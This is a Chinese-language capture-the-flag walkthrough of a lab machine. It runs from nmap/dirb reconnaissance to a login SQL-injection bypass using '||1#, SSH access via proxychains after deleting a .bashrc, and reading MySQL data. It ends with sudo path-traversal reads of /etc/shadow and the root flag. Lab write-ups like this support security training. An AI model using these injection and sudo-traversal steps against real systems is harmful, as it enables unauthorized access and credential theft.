一 信息收集
查看靶机的mac地址
kail扫描ip
访问ip
查看开放的端口
nmap -sV -p- 192.168.7.61
目录扫描查看是否有有用的信息
dirb http://192.168.7.61
返回登录页面,登录时使用burp抓包,并在email处拼接 ',发现返回包出现sql报错
接着拼接or 1=1 # 发现被过滤了
尝试使用||代替or,拼接'||1#,显示登录成功,并出现一组账号密码:john hereisjohn
二 权限获取
得到账号密码 尝试ssh连接 但是连接失败 使用代理工具proxychains进行配置代理
vi /etc/proxychains4.conf
使用proxychains登录 发现登录后会直接退出
proxychains ssh john@192.168.7.61
尝试在登陆同时执行命令
查看文件 看到.bashrc文件 发现这个文件有一个退出代码
将该文件删除就可以解决自动退出问题
cd到网站目录 查看配置文件
查看login.php文件
连接mysql
mysql -uroot -proot
查看数据库数据
show databases;
use SkyTech;
show tables;
select * from login;
在john用户处输入sudo -l查看可提权的命令,发现没有
sudo 切换sara用户 发现无法切换 也得删掉.bashrc文件
三 权限提升
删掉.bashrc文件
proxychains ssh sara@192.168.7.61 ls -la
proxychains ssh sara@192.168.7.61 rm .bashrc
proxychains ssh sara@192.168.7.61
发现sara也是普通用户 输入sudo -l 查看显示允许当前用户使用的命令
发现可以在/accounts/*使用root的cat和ls命令
sudo cat /accounts/../etc/shadow
sudo /bin/cat /accounts/../../../root/flag.txt